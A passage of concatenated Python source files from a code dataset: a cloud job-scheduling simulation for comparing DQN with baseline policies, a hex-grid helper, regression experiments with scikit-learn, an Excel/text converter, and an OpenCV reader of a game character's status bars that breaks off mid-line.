stats.expon.rvs(scale=1 / lamda[w], size=change_jobs)\n print('lamda:', lamda[w], 'intervalT mean: ', round(np.mean(intervalT), 3), ' intervalT SD:',\n round(np.std(intervalT, ddof=1), 3))\n all_intervalT[w*change_jobs : (w+1)*change_jobs] = intervalT\n arrival_Times = np.around(all_intervalT.cumsum(), decimals=3)\n self.arrival_Times = arrival_Times\n last_arrivalT = arrival_Times[- 1]\n print('last job arrivalT:', round(last_arrivalT, 3))\n\n # generate jobs' length\n \n self.jobsMI = np.random.normal(self.jobMI, self.jobMI_std, self.jobNum)\n self.jobsMI = self.jobsMI.astype(int)\n print(\"MI mean: \", round(np.mean(self.jobsMI), 3), ' MI SD:', round(np.std(self.jobsMI, ddof=1), 3))\n self.lengths = self.jobsMI / self.VMcapacity\n print(\"length mean: \", round(np.mean(self.lengths), 3), ' length SD:', round(np.std(self.lengths, ddof=1), 3))\n\n # generate jobs' type\n types = np.zeros(self.jobNum)\n for i in range(self.jobNum):\n if np.random.uniform() < 0.5:\n types[i] = 0\n else:\n types[i] = 1\n self.types = types\n\n def reset(self):\n # if each episode generates new workload\n self.arrival_Times = self.gen_random_jobsTimes(self.lamda_range[0], self.lamda_range[1])\n self.jobNum = len(self.arrival_Times)\n self.jobsMI = np.zeros(self.jobNum)\n self.lengths = np.zeros(self.jobNum)\n self.types = np.zeros(self.jobNum)\n self.ddl = np.ones(self.jobNum) * 0.25 # 250ms = waitT + exeT\n self.gen_random_jobsOthers()\n\n # reset all records\n self.RAN_events = np.zeros((9, self.jobNum)) # random policy\n self.RAN_VM_events = np.zeros((2, self.VMnum))\n self.RR_events = np.zeros((9, self.jobNum)) # round robin policy\n self.RR_VM_events = np.zeros((2, self.VMnum))\n self.early_events = np.zeros((9, self.jobNum)) # earliest policy\n self.early_VM_events = np.zeros((2, self.VMnum))\n self.DQN_events = np.zeros((9, self.jobNum)) # DQN policy\n self.DQN_VM_events = np.zeros((2, self.VMnum))\n \n\n def workload(self, job_count):\n arrival_time = self.arrival_Times[job_count-1]\n length = self.lengths[job_count-1]\n jobType = self.types[job_count-1]\n ddl = self.ddl[job_count-1]\n if job_count == self.jobNum:\n finish = True\n else:\n finish = False\n job_attributes = [job_count-1, arrival_time, length, jobType, ddl]\n return finish, 
job_attributes\n\n def feedback(self, job_attrs, action, policyID):\n job_id = job_attrs[0]\n arrival_time = job_attrs[1]\n length = job_attrs[2]\n job_type = job_attrs[3]\n ddl = job_attrs[4]\n \n \n if self.VMtypes[action] == 1 :\n self.VMEnergypertimeunit[action] = 1.5\n real_length = length / 2\n else:\n self.VMEnergypertimeunit[action] = 1.25\n real_length = length\n \n if policyID == 1:\n idleT = self.RAN_VM_events[0, action]\n elif policyID == 2:\n idleT = self.RR_VM_events[0, action]\n elif policyID == 3:\n idleT = self.early_VM_events[0, action]\n elif policyID == 4:\n idleT = self.DQN_VM_events[0, action]\n elif policyID == 5:\n idleT = self.suit_VM_events[0, action]\n elif policyID == 6:\n idleT = self.sensible_VM_events[0, action]\n\n # waitT & start exeT\n if idleT <= arrival_time: # if no waitT\n waitT = 0\n startT = arrival_time\n else:\n waitT = idleT - arrival_time\n startT = idleT\n \n durationT = waitT + real_length # waitT+exeT\n leaveT = startT + real_length # leave T\n new_idleT = leaveT # update VM idle time\n \n Energyfunction = self.VMEnergypertimeunit[action]\n Q0S = - durationT/length\n total_energy = real_length * Energyfunction\n # reward\n reward = - (Q0S/durationT) * (1/total_energy)\n \n\n # whether success\n #success = 1 if durationT <= ddl else 0\n success = 1 if total_energy <= 0.090 else 0\n \n Energy = [total_energy, real_length, Q0S, Q0S/durationT, durationT]\n \n\n if policyID == 1:\n self.RAN_events[0, job_id] = action\n self.RAN_events[2, job_id] = waitT\n self.RAN_events[1, job_id] = startT\n self.RAN_events[3, job_id] = durationT\n self.RAN_events[4, job_id] = leaveT\n self.RAN_events[5, job_id] = reward\n self.RAN_events[6, job_id] = real_length\n self.RAN_events[7, job_id] = success\n # update VM info\n self.RAN_VM_events[1, action] += 1\n self.RAN_VM_events[0, action] = new_idleT\n # print('VMC_after:', self.RAN_VM_events[0, action])\n elif policyID == 2:\n self.RR_events[0, job_id] = action\n self.RR_events[2, job_id] = waitT\n self.RR_events[1, job_id] = startT\n self.RR_events[3, job_id] = durationT\n self.RR_events[4, job_id] = leaveT\n self.RR_events[5, job_id] = reward\n self.RR_events[6, job_id] = real_length\n self.RR_events[7, job_id] = success\n # update VM info\n self.RR_VM_events[1, action] += 1\n self.RR_VM_events[0, action] = new_idleT\n elif policyID == 3:\n self.early_events[0, job_id] = action\n self.early_events[2, job_id] = waitT\n self.early_events[1, job_id] = startT\n self.early_events[3, job_id] = durationT\n self.early_events[4, job_id] = leaveT\n self.early_events[5, job_id] = reward\n self.early_events[6, job_id] = real_length\n self.early_events[7, job_id] = success\n # update VM info\n self.early_VM_events[1, action] += 1\n self.early_VM_events[0, action] = new_idleT\n elif policyID == 4:\n self.DQN_events[0, job_id] = action\n self.DQN_events[2, job_id] = waitT\n self.DQN_events[1, job_id] = startT\n self.DQN_events[3, job_id] = durationT\n self.DQN_events[4, job_id] = leaveT\n self.DQN_events[5, job_id] = reward\n self.DQN_events[6, job_id] = real_length\n self.DQN_events[7, job_id] = success\n # update VM info\n self.DQN_VM_events[1, action] += 1\n self.DQN_VM_events[0, action] = new_idleT\n elif policyID == 5:\n self.suit_events[0, job_id] = action\n self.suit_events[2, job_id] = waitT\n self.suit_events[1, job_id] = startT\n self.suit_events[3, job_id] = durationT\n self.suit_events[4, job_id] = leaveT\n self.suit_events[5, job_id] = reward\n self.suit_events[6, job_id] = real_length\n self.suit_events[7, 
job_id] = success\n \n return Energy, reward\n\n def feedbackD(self, job_attrs, action): # reject job\n job_id = job_attrs[0]\n self.DQN_events[2, job_id] = 0 # waitT\n self.DQN_events[1, job_id] = 0 # startT\n self.DQN_events[3, job_id] = 0 # durationT\n self.DQN_events[4, job_id] = 0 # leaveT\n self.DQN_events[5, job_id] = 0 # reward\n self.DQN_events[6, job_id] = 0 # real_length\n self.DQN_events[7, job_id] = 0 # success\n self.DQN_events[8, job_id] = 1 # whether reject\n # update VM info\n self.DQN_events[0, job_id] = action\n self.DQN_VM_events[1, action] += 1\n\n return self.DQN_events[5, job_id]\n\n def get_VM_idleT(self, policyID):\n if policyID == 3:\n idleTimes = self.early_VM_events[0, :]\n elif policyID == 4:\n idleTimes = self.DQN_VM_events[0, :]\n elif policyID == 5:\n idleTimes = self.suit_VM_events[0, :]\n return idleTimes\n\n def getState(self, job_attrs, policyID):\n arrivalT = job_attrs[1]\n length = job_attrs[2]\n job_type = job_attrs[3]\n\n # state_job = [length, job_type]\n state_job = [job_type]\n # wait Time\n if policyID ==4: # DQN\n idleTimes = self.get_VM_idleT(4)\n elif policyID ==5: # suitable\n idleTimes = self.get_VM_idleT(5)\n waitTimes = [t - arrivalT for t in idleTimes]\n waitTimes = np.maximum(waitTimes, 0)\n # print('waitTimes:', waitTimes, ' ', end='')\n\n state = np.hstack((state_job, waitTimes)) # only consider job length & waitT\n return state\n\n def getStateP(self, job_id):\n duration = self.sensible_events[3, job_id]\n return duration\n\n\n def get_accumulateRewards(self, policies, start, end):\n rewards = np.zeros(policies)\n\n rewards[0] = sum(self.RAN_events[5, start:end])\n rewards[1] = sum(self.RR_events[5, start:end])\n rewards[2] = sum(self.early_events[5, start:end])\n rewards[3] = sum(self.DQN_events[5, start:end])\n #rewards[4] = sum(self.suit_events[5, start:end])\n #rewards[5] = sum(self.sensible_events[5, start:end])\n return np.around(rewards, 2)\n\n def get_FinishTimes(self, policies, start, end):\n finishT = np.zeros(policies)\n finishT[0] = max(self.RAN_events[4, start:end])\n finishT[1] = max(self.RR_events[4, start:end])\n finishT[2] = max(self.early_events[4, start:end])\n finishT[3] = max(self.DQN_events[4, start:end])\n #finishT[4] = max(self.suit_events[4, start:end])\n #finishT[5] = max(self.sensible_events[4, start:end])\n return np.around(finishT, 2)\n\n def get_executeTs(self, policies, start, end):\n executeTs = np.zeros(policies)\n executeTs[0] = np.mean(self.RAN_events[6, start:end])\n executeTs[1] = np.mean(self.RR_events[6, start:end])\n executeTs[2] = np.mean(self.early_events[6, start:end])\n executeTs[3] = np.mean(self.DQN_events[6, start:end])\n #executeTs[4] = np.mean(self.suit_events[6, start:end])\n #executeTs[5] = np.mean(self.sensible_events[6, start:end])\n return np.around(executeTs, 3)\n\n def get_waitTs(self, policies, start, end):\n waitTs = np.zeros(policies)\n waitTs[0] = np.mean(self.RAN_events[2, start:end])\n waitTs[1] = np.mean(self.RR_events[2, start:end])\n waitTs[2] = np.mean(self.early_events[2, start:end])\n waitTs[3] = np.mean(self.DQN_events[2, start:end])\n #waitTs[4] = np.mean(self.suit_events[2, start:end])\n #waitTs[5] = np.mean(self.sensible_events[2, start:end])\n return np.around(waitTs, 3)\n\n def get_responseTs(self, policies, start, end):\n respTs = np.zeros(policies)\n respTs[0] = np.mean(self.RAN_events[3, start:end])\n respTs[1] = np.mean(self.RR_events[3, start:end])\n respTs[2] = np.mean(self.early_events[3, start:end])\n respTs[3] = np.mean(self.DQN_events[3, start:end])\n 
#respTs[4] = np.mean(self.suit_events[3, start:end])\n #respTs[5] = np.mean(self.sensible_events[3, start:end])\n return np.around(respTs, 3)\n\n def get_successTimes(self, policies, start, end):\n successT = np.zeros(policies)\n successT[0] = sum(self.RAN_events[7, start:end])/(end - start)\n successT[1] = sum(self.RR_events[7, start:end])/(end - start)\n successT[2] = sum(self.early_events[7, start:end])/(end - start)\n successT[3] = sum(self.DQN_events[7, start:end])/(end - start)\n #successT[4] = sum(self.suit_events[7, start:end]) / (end - start)\n #successT[5] = sum(self.sensible_events[7, start:end]) / (end - start)\n # successT = successT.astype(int)\n successT = np.around(successT, 3)\n return successT\n\n def get_rejectTimes(self, policies, start, end):\n reject = np.zeros(policies)\n reject[0] = sum(self.RAN_events[8, start:end])\n reject[1] = sum(self.RR_events[8, start:end])\n reject[2] = sum(self.early_events[8, start:end])\n reject[3] = sum(self.DQN_events[8, start:end])\n #reject[4] = sum(self.suit_events[8, start:end])\n #reject[5] = sum(self.sensible_events[8, start:end])\n return np.around(reject, 2)\n\n def get_JobDistribution(self, policies):\n distributions = np.zeros((policies, self.VMnum))\n distributions[0, :] = self.RAN_VM_events[1, :]/self.jobNum\n distributions[1, :] = self.RR_VM_events[1, :]/self.jobNum\n distributions[2, :] = self.early_VM_events[1, :]/self.jobNum\n distributions[3, :] = self.DQN_VM_events[1, :]/self.jobNum\n #distributions[4, :] = self.suit_VM_events[1, :] / self.jobNum\n #distributions[5, :] = self.sensible_VM_events[1, :] / self.jobNum\n return np.around(distributions, 3)\n\n def get_totalRewards(self, policies, start):\n rewards = np.zeros(policies)\n rewards[0] = sum(self.RAN_events[5, start:self.jobNum])\n rewards[1] = sum(self.RR_events[5, start:self.jobNum])\n rewards[2] = sum(self.early_events[5, start:self.jobNum])\n rewards[3] = sum(self.DQN_events[5, start:self.jobNum])\n #rewards[4] = sum(self.suit_events[5, start:self.jobNum])\n #rewards[5] = sum(self.sensible_events[5, start:self.jobNum])\n return np.around(rewards, 2)\n\n def get_totalTimes(self, policies, start):\n finishT = np.zeros(policies)\n finishT[0] = max(self.RAN_events[4, :]) - self.arrival_Times[start]\n finishT[1] = max(self.RR_events[4, :]) - self.arrival_Times[start]\n finishT[2] = max(self.early_events[4, :]) - self.arrival_Times[start]\n finishT[3] = max(self.DQN_events[4, :]) - self.arrival_Times[start]\n #finishT[4] = max(self.suit_events[4, :]) - self.arrival_Times[start]\n #finishT[5] = max(self.sensible_events[4, :]) - self.arrival_Times[start]\n return np.around(finishT, 2)\n\n def get_avgUtilitizationRate(self, policies, start):\n avgRate = np.zeros(policies) # sum(real_length)/ totalT*VMnum\n avgRate[0] = sum(self.RAN_events[6, start:self.jobNum]) / ((max(self.RAN_events[4, :]) - self.arrival_Times[start]) * self.VMnum)\n avgRate[1] = sum(self.RR_events[6, start:self.jobNum]) / ((max(self.RR_events[4, :]) - self.arrival_Times[start]) * self.VMnum)\n avgRate[2] = sum(self.early_events[6, start:self.jobNum]) / ((max(self.early_events[4, :]) - self.arrival_Times[start]) * self.VMnum)\n avgRate[3] = sum(self.DQN_events[6, start:self.jobNum]) / ((max(self.DQN_events[4, :]) - self.arrival_Times[start]) * self.VMnum)\n #avgRate[4] = sum(self.suit_events[6, start:self.jobNum]) / ((max(self.suit_events[4, :]) - self.arrival_Times[start]) * self.VMnum)\n #avgRate[5] = sum(self.sensible_events[6, start:self.jobNum]) / ((max(self.sensible_events[4, :]) - 
self.arrival_Times[start]) * self.VMnum)\n        return np.around(avgRate, 3)\n\n    def get_all_responseTs(self, policies):\n        respTs = np.zeros((policies, self.jobNum))\n        respTs[0, :] = self.RAN_events[3, :]\n        respTs[1, :] = self.RR_events[3, :]\n        respTs[2, :] = self.early_events[3, :]\n        respTs[3, :] = self.DQN_events[3, :]\n        #respTs[4, :] = self.suit_events[3, :]\n        #respTs[5, :] = self.sensible_events[3, :]\n        return np.around(respTs, 3)\n\n    def get_total_responseTs(self, policies, start):\n        respTs = np.zeros(policies)\n        respTs[0] = np.mean(self.RAN_events[3, start:self.jobNum])\n        respTs[1] = np.mean(self.RR_events[3, start:self.jobNum])\n        respTs[2] = np.mean(self.early_events[3, start:self.jobNum])\n        respTs[3] = np.mean(self.DQN_events[3, start:self.jobNum])\n        #respTs[4] = np.mean(self.suit_events[3, start:self.jobNum])\n        #respTs[5] = np.mean(self.sensible_events[3, start:self.jobNum])\n        return np.around(respTs, 3)\n\n    def get_totalSuccess(self, policies, start):\n        successT = np.zeros(policies) # sum(self.RAN_events[7, 3000:-1])/(self.jobNum - 3000)\n        successT[0] = sum(self.RAN_events[7, start:self.jobNum])/(self.jobNum - start + 1)\n        successT[1] = sum(self.RR_events[7, start:self.jobNum])/(self.jobNum - start + 1)\n        successT[2] = sum(self.early_events[7, start:self.jobNum])/(self.jobNum - start + 1)\n        successT[3] = sum(self.DQN_events[7, start:self.jobNum])/(self.jobNum - start + 1)\n        #successT[4] = sum(self.suit_events[7, start:self.jobNum]) / (self.jobNum - start + 1)\n        #successT[5] = sum(self.sensible_events[7, start:self.jobNum]) / (self.jobNum - start + 1)\n        return np.around(successT, 3)\n\n    \n    \n\n","sub_path":"Implementation/5000 Jobs/MyEnv1.py","file_name":"MyEnv1.py","file_ext":"py","file_size_in_byte":21334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"112480415","text":"import pickle\nimport os\nglobal bef_calc_around\nbef_calc_around=None\ndef get_around(x,y):\n    '''\n    Return the precomputed result.\n    :param x: x position\n    :param y: y position\n    :return: positions of the cells connected to that position\n    '''\n    global bef_calc_around\n    if bef_calc_around is None:\n        if not os.path.exists(\"./around.pkl\"):\n            calc_get_around()\n        with open(\"./around.pkl\",\"rb\") as around:\n            bef_calc_around=pickle.load(around)\n    return bef_calc_around[x][y]\ndef calc_get_around():\n    '''\n    Run _get_around over every cell and save the results.\n    :return:\n    '''\n    bef_calc=[]\n    for i in range(9):\n        ls=[]\n        for j in range(9):\n            ls.append(_get_around(i,j))\n        bef_calc.append(ls)\n    with open(\"./around.pkl\",\"wb\") as f:\n        pickle.dump(bef_calc,f)\ndef _get_around(x,y):\n    '''\n    Find the surrounding cells.\n    :param x: x position\n    :param y: y position\n    :return: dict of the surrounding coordinates\n    '''\n    dic={}\n    dic[\"RU\"] = get_line_cells_(x,y,\"U\",\"R\")\n    dic[\"RD\"] = get_line_cells_(x,y,\"D\",\"R\")\n    dic[\"LU\"] = get_line_cells_(x,y,\"U\",\"L\")\n    dic[\"LD\"] = get_line_cells_(x,y,\"D\",\"L\")\n    dic[\"U\"] = get_line_cells_(x,y,\"U\",None)\n    dic[\"D\"] = get_line_cells_(x,y,\"D\",None)\n    return dic\ndef get_line_cells_(x,y,vertical,holizon):\n    '''\n    Return the cells on a straight line.\n    :param x: x position\n    :param y: y position\n    :param vertical: up or down\n    :param holizon: right, left or none\n    :return: tuple of the respective positions\n    '''\n    ls1=[]\n    ls2=[]\n    bx=x\n    by=y\n    while True:\n        ax,ay=calc_cell_point(bx,by,vertical,holizon)\n        if 0<=ay<9 and 0<=ax<9:\n            ls1.append(ax)\n            ls2.append(ay)\n        else:\n            break\n        bx,by=ax,ay\n    return (tuple(ls2),tuple(ls1))\n\ndef calc_cell_point(x,y,vertical,holizon):\n    '''\n    Return the actual adjacent cell.\n    :param x: x position\n    :param y: y position\n    :param vertical: up or down\n    :param holizon: right, left or none\n    :return: cell position\n    '''\n    if holizon==None:\n        if 
vertical==\"U\":\n return (x,y-1)\n else:\n return (x,y+1)\n if holizon==\"R\":\n rx=x+1\n else:\n rx=x-1\n if vertical==\"U\":\n ry=y - 1 + (x % 2)\n else:\n ry= y + (x%2)\n return (rx,ry)","sub_path":"BeforeCalc.py","file_name":"BeforeCalc.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"252885676","text":"#########################################################################\n#### Ted Brundage, M.S.E., Princeton University\n#### Advisor: Barbara Engelhardt\n####\n#### Code: PM Greedy and Sampling Predictor Generator\n####\n#### Last updated: 4/29/16\n####\n#### Notes and disclaimers:\n#### - Use only numpy.ndarray, not numpy.matrix to avoid any confusion\n#### - If something is a column vector - MAKE IT A COLUMN VECTOR. Makes \n#### manipulation annoying, but it keeps matrix algebra logical. \n####\n#########################################################################\n\n#########################################################################\n###\n### IMPORTS\n###\n\nimport os\nimport sys\nimport time\nfrom copy import deepcopy as dc\nimport datetime\n\nmainpath = \"/Users/Ted/__Engelhardt/Engelhardt_DPP\"\nsys.path.append(os.path.abspath(mainpath))\n\nimport numpy as np\n# import pickle\nimport dill\nimport Predictor as Predictor\nimport PredictorWrapper as PredictorWrapper\nfrom sklearn.linear_model import Ridge, Lasso, Lars\nimport Utils.ExperimentUtils as ExperimentUtils\n\n\n#########################################################################\n\n\nsetStart = int(sys.argv[1])\nsetFinal = int(sys.argv[2])\n\nfor i in range(setStart,setFinal):\n currentDir = 'Fold%d/' % i\n X_tr = np.load('%sX_tr.npy' % currentDir)\n y_tr = np.array([np.load('%sy_tr.npy' % currentDir)]).T\n\n val_size = int(0.1 * X_tr.shape[0])\n X_val = X_tr[0:val_size,:]\n y_val = y_tr[0:val_size,:]\n X_train = X_tr[val_size:,:]\n y_train = y_tr[val_size:,:]\n\n logDir = '%sStandardRegressions/' % currentDir\n if not os.path.exists(logDir):\n os.makedirs(logDir)\n logFile = '%sLogs.txt' % logDir\n\n ##########\n ## OLSR ##\n ##########\n olsr_predictor = Predictor.Predictor(X_tr,y_tr,gamma=np.ones((X_tr.shape[1],1)))\n dill.dump(olsr_predictor,open('%sOLSR.p' % logDir,'wb'))\n\n ###########\n ## RIDGE ##\n ###########\n ridgeLams = np.logspace(-5,6,500)\n\n def ridgeEval(learned):\n learned_yhat = learned.predict(X_val)\n learned_mse = sum((y_val - learned_yhat) ** 2)[0]\n return learned_mse\n\n def ridgeLearn(lam):\n ridge = Ridge(alpha=lam,fit_intercept=False,copy_X=True)\n ridge.fit(X_train,y_train)\n return ridge\n\n optLam = ExperimentUtils.gridSearch1D(ridgeLams, ridgeLearn, ridgeEval, MAX=False)\n ridge_predictor = Predictor.Predictor(X_tr,y_tr,gamma=np.ones((X_tr.shape[1],1)),c=optLam)\n dill.dump(ridge_predictor,open('%sRIDGE.p' % logDir,'wb'))\n with open(logFile,'a') as f:\n f.write('Ridge c: %15.10f\\n' % optLam)\n\n ###########\n ## LASSO ##\n ###########\n lassoLams = np.logspace(-5,6,500)\n\n def lassoEval(learned):\n learned_yhat = learned.predict(X_val)\n learned_mse = sum((y_val - learned_yhat) ** 2)[0]\n return learned_mse\n\n def lassoLearn(lam):\n lasso = Lasso(alpha=lam,fit_intercept=False,copy_X=True,max_iter=1.e7,tol=.0001)\n lasso.fit(X_train,y_train)\n return lasso\n\n optLam = ExperimentUtils.gridSearch1D(lassoLams, lassoLearn, lassoEval, MAX=False)\n lasso = Lasso(alpha=optLam,fit_intercept=False,copy_X=True,max_iter=1.e7,tol=.0001)\n lasso.fit(X_tr,y_tr)\n lasso_beta = 
np.array([lasso.coef_]).T\n    lasso_gamma = np.array([[0. if abs(x) < 1e-100 else 1. for x in lasso.coef_]]).T\n    # P = lambda X: lasso.predict(X)\n    lasso_predictor = PredictorWrapper.PredictorWrapper(lasso_beta,lasso_gamma,lasso.predict)\n    dill.dump(lasso_predictor,open('%sLASSO.p' % logDir,'wb'))\n    with open(logFile,'a') as f:\n        f.write('Lasso c: %15.10f alpha: %15.10f\\n' % (1./(2.* X_tr.shape[0]), optLam))\n\n\n\n    ##############\n    ## LARS_SET ##\n    ##############\n    kappa = [2,4,10]\n    for k in kappa:\n        lars = Lars(n_nonzero_coefs=k,fit_intercept=False)\n        lars.fit(X_tr,y_tr)\n        lars_beta = np.array([lars.coef_]).T\n        lars_gamma = np.zeros((X_tr.shape[1],1))\n        lars_gamma[lars.active_] = 1.\n        lars_predictor = PredictorWrapper.PredictorWrapper(lars_beta,lars_gamma,lars.predict)\n        dill.dump(lars_predictor,open('%sLARS_%02d.p' % (logDir,k),'wb'))\n\n    ##############\n    ## LARS_OPT ##\n    ##############\n    larsKappas = np.linspace(0,40,41,dtype=int)\n\n    def larsEval(learned):\n        learned_yhat = np.array([learned.predict(X_val)]).T\n        learned_mse = sum((y_val - learned_yhat) ** 2)[0]\n        return learned_mse\n\n    def larsLearn(kap):\n        lars = Lars(n_nonzero_coefs=kap,fit_intercept=False)\n        lars.fit(X_train,y_train)\n        return lars\n\n    optKap = ExperimentUtils.gridSearch1D(larsKappas,larsLearn, larsEval, MAX=False)\n    lars = Lars(n_nonzero_coefs=optKap,fit_intercept=False)\n    lars.fit(X_tr,y_tr)\n    # print larsEval(lars)\n    lars_beta = np.array([lars.coef_]).T\n    lars_gamma = np.zeros((X_tr.shape[1],1))\n    lars_gamma[lars.active_] = 1.\n    lars_predictor = PredictorWrapper.PredictorWrapper(lars_beta,lars_gamma,lars.predict)\n    dill.dump(lars_predictor,open('%sLARS_OPT.p' % logDir,'wb'))\n    with open(logFile,'a') as f:\n        f.write('Lars optimized n_nonzero_coefs: %d \\n' % optKap)\n\n","sub_path":"UCI/StandardRegressions.py","file_name":"StandardRegressions.py","file_ext":"py","file_size_in_byte":5168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"553951183","text":"#coding:utf-8\nimport xlrd\nimport xlwt\nimport os\nimport sys\n\n# read_excel excel=>mem \n# read_text text=>mem\n\n# write_text mem=>text\n# write_excel mem=>excel\n\n# trans_excel text=>mem=>excel\n# trans_text excel=>mem=>text\n\ndef read_excel(pathname,sheetname='Sheet1'):\n    excel = xlrd.open_workbook(pathname)\n    if (sheetname in excel.sheet_names()):\n        table = []\n        sheet = excel.sheet_by_name(sheetname)\n        for index in range(sheet.nrows):\n            row = sheet.row_values(index)\n            table.append(row)\n        return table\n    else:\n        return None\n\ndef write_excel(pathname,table,tablename='Sheet1'):\n    workbook = xlwt.Workbook()\n    worksheet = workbook.add_sheet(tablename)\n    nrows = len(table)\n    ncols = 0\n    for row in table:\n        if ncols <= len(row):\n            ncols = len(row)\n    for row in range(len(table)):\n        record = table[row]\n        for col in range(len(record)):\n            worksheet.write(row, col, label = table[row][col])\n    workbook.save(pathname)\n\ndef read_text(pathname):\n    if os.path.exists(pathname):\n        with open(pathname, 'r') as file:\n            list = file.readlines()\n        table = []\n        for row in list:\n            table.append(row.split(\"\\t\"))\n        return table\n    else:\n        return None\n\ndef write_text(pathname,table,sheetname='Sheet1'):\n    if table:\n        content = []\n        for row in table:\n            record = [str(item) for item in row]\n            content.append(\"\\t\".join(record))\n        file = open(pathname.replace(\".xlsx\",\"\").replace(\".xls\",\"\")+\"_\"+sheetname+\".txt\",\"w\")\n        file.write(\"\\n\".join(content))\n        file.close()\n\ndef trans_text(pathname):\n    excel = 
xlrd.open_workbook(pathname)\n for sheet_name in excel.sheet_names():\n table = read_excel(pathname,sheet_name)\n write_text(pathname,table,sheet_name)\n\ndef trans_excel(pathname,sheetname='Sheet1'):\n table = read_text(pathname)\n if table:\n write_excel(pathname.replace(\".txt\",\"\")+\".xls\",table,sheetname)\n\n# cmd tool\nthe_pathname = sys.argv[-1]\nif \"tabot.py\" not in the_pathname:\n if \".xlsx\" in the_pathname:\n trans_text(the_pathname)\n elif \".xls\" in the_pathname:\n trans_text(the_pathname)\n elif \".txt\" in the_pathname:\n trans_excel(the_pathname)\nelse:\n print(\"tabot loading...\")\n\n","sub_path":"lib/Document/Tabot/tabot.py","file_name":"tabot.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"146229287","text":"import cv2\nimport numpy as np\nimport colors\nimport os\n\nrelevant_buffs = [\"Battle Shout\"]\n\n\nclass PlayerProperties:\n def __init__(self):\n self.hit_points = 0.0\n self.rage_points = 0\n self.buffs = list()\n self.debuffs = list()\n self.level = 1\n self.name = \"Unknown\"\n self.in_combat = False\n self.is_dead = False\n self.is_ghost = False\n self.has_target = False\n self.experience = 0.0\n\n def update_all(self, player_frame_img, exp_bar_img, release_box_img, buffs_section_img):\n self.update_combat_related(\n player_frame_img=player_frame_img,\n buffs_section_img=buffs_section_img)\n self.update_experience(exp_bar_img=exp_bar_img)\n self.update_level(player_frame_img=player_frame_img)\n self.update_name(player_frame_img=player_frame_img)\n self.update_is_dead(release_box_img=release_box_img)\n self.update_is_ghost(buffs_section_img=buffs_section_img)\n\n def update_combat_related(self, player_frame_img, buffs_section_img):\n self.update_hit_points(player_frame_img=player_frame_img)\n self.update_rage_points(player_frame_img=player_frame_img)\n self.update_in_combat(player_frame_img=player_frame_img)\n self.update_buffs(buffs_section_img=buffs_section_img)\n self.update_debuffs(buffs_section_img=buffs_section_img)\n\n def update_hit_points(self, player_frame_img):\n hp_line = player_frame_img[49:50, 96:241]\n green_hp_line = cv2.split(hp_line)[1]\n _, hp_line_threshold = cv2.threshold(green_hp_line, 75, 255, cv2.THRESH_BINARY)\n hp_bar_pixels = len(hp_line_threshold.ravel()) - 1\n for idx, pixel in enumerate(hp_line_threshold.ravel()[::-1]):\n if pixel == 255:\n self.hit_points = ((hp_bar_pixels - idx) / hp_bar_pixels) * 100\n break\n # If the pixel is never found then our health must be zero\n else:\n self.hit_points = 0.0\n\n def update_rage_points(self, player_frame_img):\n rage_line = player_frame_img[61:62, 96:241]\n red_rage_line = cv2.split(rage_line)[2]\n _, rage_line_threshold = cv2.threshold(red_rage_line, 75, 255, cv2.THRESH_BINARY)\n rage_bar_pixels = len(rage_line_threshold.ravel()) - 1\n for idx, pixel in enumerate(rage_line_threshold.ravel()[::-1]):\n if pixel == 255:\n self.rage_points = int(round(((rage_bar_pixels - idx) / rage_bar_pixels) * 100))\n break\n # If the pixel is never found then our rage must be zero\n else:\n self.rage_points = 0\n\n def update_level(self, player_frame_img):\n self.update_in_combat(player_frame_img=player_frame_img)\n if not self.in_combat:\n level_section = player_frame_img[68:81, 14:33]\n level_section[:, :, 0] = 0\n level_section_grey = cv2.cvtColor(level_section, cv2.COLOR_BGR2GRAY)\n _, level_section_threshold = cv2.threshold(level_section_grey, 127, 255,\n cv2.THRESH_BINARY)\n # TODO: Finish 
this with some number recognition\n self.level = 1\n\n def update_name(self, player_frame_img):\n pass\n\n def update_in_combat(self, player_frame_img):\n combat_icon = player_frame_img[68:81, 14:33]\n combat_icon_grey = cv2.cvtColor(combat_icon, cv2.COLOR_BGR2GRAY)\n ref_combat_icon = cv2.imread(os.path.join(\"..\", \"tests\", \"combat_icon.png\"))\n ref_combat_icon_grey = cv2.cvtColor(ref_combat_icon, cv2.COLOR_BGR2GRAY)\n diff_img = cv2.bitwise_xor(combat_icon_grey, ref_combat_icon_grey)\n if np.sum(diff_img) < 20000:\n self.in_combat = True\n else:\n self.in_combat = False\n\n def update_is_dead(self, release_box_img):\n pass\n\n def update_is_ghost(self, buffs_section_img):\n ghost_debuff_grey = cv2.imread(os.path.join(\"..\", \"tests\", \"ghost_debuff_icon.png\"), 0)\n buffs_grey = cv2.cvtColor(buffs_section_img, cv2.COLOR_BGR2GRAY)\n w, h = ghost_debuff_grey.shape[::-1]\n res = cv2.matchTemplate(buffs_grey, ghost_debuff_grey, cv2.TM_CCOEFF_NORMED)\n threshold = 0.8\n loc = np.where(res >= threshold)\n print(\"G: {}\".format(loc))\n for point in zip(*loc[::-1]):\n cv2.rectangle(buffs_section_img, point, (point[0]+w, point[1]+h), (255,255,0), 2)\n cv2.imshow(\"ghost_found.png\", buffs_section_img)\n\n def update_experience(self, exp_bar_img):\n exp_line = exp_bar_img[3:4, 3:1285]\n exp_line_blue, exp_line_green, exp_line_red = cv2.split(exp_line)\n exp_line_without_bars = cv2.subtract(exp_line_red, exp_line_green)\n _, exp_line_thresh = cv2.threshold(exp_line_without_bars, 80, 255, cv2.THRESH_BINARY)\n exp_bar_pixels = len(exp_line_thresh.ravel()) - 1\n for idx, pixel in enumerate(exp_line_thresh.ravel()[::-1]):\n if pixel == 255:\n self.experience = ((exp_bar_pixels - idx) / exp_bar_pixels) * 100\n break\n # If the pixel is never found then our experience must be zero\n else:\n self.experience = 0\n\n def update_buffs(self, buffs_section_img):\n for buff in relevant_buffs:\n buffs_section_img_copy = buffs_section_img.copy()\n buff_filename = buff.lower().replace(\" \", \"_\") + \"_buff_icon.png\"\n buff_icon_grey = cv2.imread(os.path.join(\"..\", \"tests\", buff_filename), 0)\n buff_section_grey = cv2.cvtColor(buffs_section_img, 